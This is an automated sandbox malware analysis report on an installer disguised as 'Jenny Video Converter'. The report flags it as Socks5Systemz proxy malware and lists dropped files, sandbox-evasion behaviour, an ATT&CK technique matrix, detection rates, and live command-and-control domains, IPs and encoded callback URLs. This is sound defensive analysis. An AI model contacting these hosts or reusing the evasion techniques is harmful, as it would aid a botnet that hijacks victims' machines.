        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libglibmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libwinpthread-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-R14KT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-I6MFQ.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpcre-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-P1MHN.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-MCN70.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-G1ORK.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpango-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgomp-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpangoft2-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-CCK3H.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\librsvg-2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgdk_pixbuf-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\uninstall\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-DDT59.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-R59QM.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\zlib1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgcc_s_dw2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-IR87B.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-7MVDI.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpangocairo-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgdk-win32-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-S9SIF.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgobject-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libtiff-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-SPPOJ.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libjpeg-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgmodule-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\liblzma-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-73S5T.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libpixman-1-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-E27ND.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-O680T.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libintl-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-8J8L1.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SQ448.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\libgraphite2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\uninstall\is-SAKD7.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-AUN77.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-19DMT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Jenny Video Converter\is-8FEA4.tmpJump to dropped file
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5699
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-18325
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe TID: 4188Thread sleep count: 129 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe TID: 4188Thread sleep time: -258000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe TID: 5140Thread sleep count: 75 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe TID: 5140Thread sleep time: -4500000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe TID: 4188Thread sleep count: 9727 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe TID: 4188Thread sleep time: -19454000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00452A4C FindFirstFileA,GetLastError,2_2_00452A4C
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,2_2_004751F8
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_00464048
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_004644C4
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,2_2_00462ABC
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,2_2_00497A74
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_00409B30
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeThread delayed: delay time: 60000Jump to behavior
        Source: jennyvideoconverter32_64.exe, 00000003.00000002.3335978046.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, jennyvideoconverter32_64.exe, 00000003.00000002.3335978046.000000000087E000.00000004.00000020.00020000.00000000.sdmp, jennyvideoconverter32_64.exe, 00000003.00000002.3335978046.0000000000899000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeAPI call chain: ExitProcess graph end nodegraph_0-6739
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeAPI call chain: ExitProcess graph end nodegraph_3-18326
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeAPI call chain: ExitProcess graph end nodegraph_3-18889
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02DA00FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02DA00FE
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02DA00FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,3_2_02DA00FE
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_004502AC
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D8648B RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_memset,_memset,3_2_02D8648B
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D99468 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02D99468
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00478420 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,2_2_00478420
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0042E0AC AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,2_2_0042E0AC
        Source: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exeCode function: 3_2_02D8F78E cpuid 3_2_02D8F78E
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: GetLocaleInfoA,0_2_004051FC
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: GetLocaleInfoA,0_2_00405248
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: GetLocaleInfoA,2_2_00408570
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: GetLocaleInfoA,2_2_004085BC
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_0045892C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,2_2_0045892C
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
        Source: C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmpCode function: 2_2_00455588 GetUserNameA,2_2_00455588
        Source: C:\Users\user\Desktop\N6jsQ3XNNX.exeCode function: 0_2_00405CE4 GetVersionExA,0_2_00405CE4

        Stealing of Sensitive Information

        barindex
        Yara detected Socks5Systemz
        Source: Yara matchFile source: 00000003.00000002.3337175115.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: jennyvideoconverter32_64.exe PID: 2760, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected Socks5Systemz
        Source: Yara matchFile source: 00000003.00000002.3337175115.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: jennyvideoconverter32_64.exe PID: 2760, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
        Native API        		1
        DLL Side-Loading        		1
        Exploitation for Privilege Escalation        		1
        Deobfuscate/Decode Files or Information        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		2
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts2
        Service Execution        		5
        Windows Service        		1
        DLL Side-Loading        		2
        Obfuscated Files or Information        		LSASS Memory1
        Account Discovery        		Remote Desktop ProtocolData from Removable Media2
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        Bootkit        		1
        Access Token Manipulation        		21
        Software Packing        		Security Account Manager2
        File and Directory Discovery        		SMB/Windows Admin SharesData from Network Shared Drive11
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook5
        Windows Service        		1
        Timestomp        		NTDS35
        System Information Discovery        		Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
        Process Injection        		1
        DLL Side-Loading        		LSA Secrets141
        Security Software Discovery        		SSHKeylogging112
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Masquerading        		Cached Domain Credentials1
        Process Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
        Virtualization/Sandbox Evasion        		DCSync21
        Virtualization/Sandbox Evasion        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Access Token Manipulation        		Proc Filesystem11
        Application Window Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
        Process Injection        		/etc/passwd and /etc/shadow3
        System Owner/User Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Bootkit        		Network Sniffing1
        Remote System Discovery        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
        System Network Configuration Discovery        		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        N6jsQ3XNNX.exe28%VirustotalBrowse

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe100%AviraHEUR/AGEN.1329998
        C:\ProgramData\ET Ammeter Side 10.7.45\ET Ammeter Side 10.7.45.exe100%AviraHEUR/AGEN.1329998
        C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe100%Joe Sandbox ML
        C:\ProgramData\ET Ammeter Side 10.7.45\ET Ammeter Side 10.7.45.exe100%Joe Sandbox ML
        C:\ProgramData\ET Ammeter Side 10.7.45\ET Ammeter Side 10.7.45.exe36%VirustotalBrowse
        C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-0NOE7.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Jenny Video Converter\is-19DMT.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-19DMT.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Jenny Video Converter\is-3L92A.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-3L92A.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Jenny Video Converter\is-73S5T.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-73S5T.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Jenny Video Converter\is-7MVDI.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-7MVDI.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Jenny Video Converter\is-8FEA4.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-8FEA4.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Jenny Video Converter\is-8J8L1.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-8J8L1.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Jenny Video Converter\is-8PPAH.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-8PPAH.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Jenny Video Converter\is-AUN77.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-AUN77.tmp1%VirustotalBrowse
        C:\Users\user\AppData\Local\Jenny Video Converter\is-CCK3H.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-CCK3H.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Jenny Video Converter\is-D0HIN.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-D0HIN.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Jenny Video Converter\is-DDT59.tmp2%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-DDT59.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Jenny Video Converter\is-E27ND.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-E27ND.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Jenny Video Converter\is-FABCG.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-FABCG.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Jenny Video Converter\is-G1ORK.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-G1ORK.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Jenny Video Converter\is-GR40U.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-GR40U.tmp0%VirustotalBrowse
        C:\Users\user\AppData\Local\Jenny Video Converter\is-I6MFQ.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-IR87B.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-KK58F.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Jenny Video Converter\is-MCN70.tmp2%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.innosetup.com/0%URL Reputationsafe
        http://www.remobjects.com/psU0%URL Reputationsafe
        http://www.remobjects.com/psU0%URL Reputationsafe
        http://www.remobjects.com/ps0%URL Reputationsafe
        http://185.208.158.248/s2%VirustotalBrowse
        http://tukaani.org/xz/0%VirustotalBrowse
        http://31.214.157.226/rand0%VirustotalBrowse
        http://tukaani.org/0%VirustotalBrowse
        http://mingw-w64.sourceforge.net/X0%VirustotalBrowse
        http://fsf.org/0%VirustotalBrowse
        http://185.208.10%VirustotalBrowse
        http://www.gnu.org/licenses/0%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        diuzout.info
        		185.208.158.248
        		truetrue
          		unknown
          212.20.149.52.in-addr.arpa
          		unknown
          		unknowntrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://31.214.157.226/randfalseunknown
            http://diuzout.info/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf712c5ec93993ctrue
              		unknown
              http://diuzout.info/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d993ece699511true
                		unknown
                diuzout.infotrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.innosetup.com/N6jsQ3XNNX.tmp, N6jsQ3XNNX.tmp, 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-SAKD7.tmp.2.dr, N6jsQ3XNNX.tmp.0.drfalse
                  • URL Reputation: safe
                  		unknown
                  http://185.208.158.248/sjennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://tukaani.org/is-7MVDI.tmp.2.drfalseunknown
                  http://185.208.158.248/search/?q=67e28dd83d5df22jennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://www.remobjects.com/psUN6jsQ3XNNX.exe, 00000000.00000003.2096777712.0000000002094000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.exe, 00000000.00000003.2096528597.0000000002310000.00000004.00001000.00020000.00000000.sdmp, N6jsQ3XNNX.tmp, 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-SAKD7.tmp.2.dr, N6jsQ3XNNX.tmp.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://tukaani.org/xz/is-7MVDI.tmp.2.drfalseunknown
                    http://185.208.158.248/search/?q=67e28dd83d5df220160jennyvideoconverter32_64.exe, 00000003.00000002.3335978046.000000000087E000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.208.158.248/search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ejennyvideoconverter32_64.exe, 00000003.00000002.3337690314.0000000003350000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://mingw-w64.sourceforge.net/Xis-73S5T.tmp.2.drfalseunknown
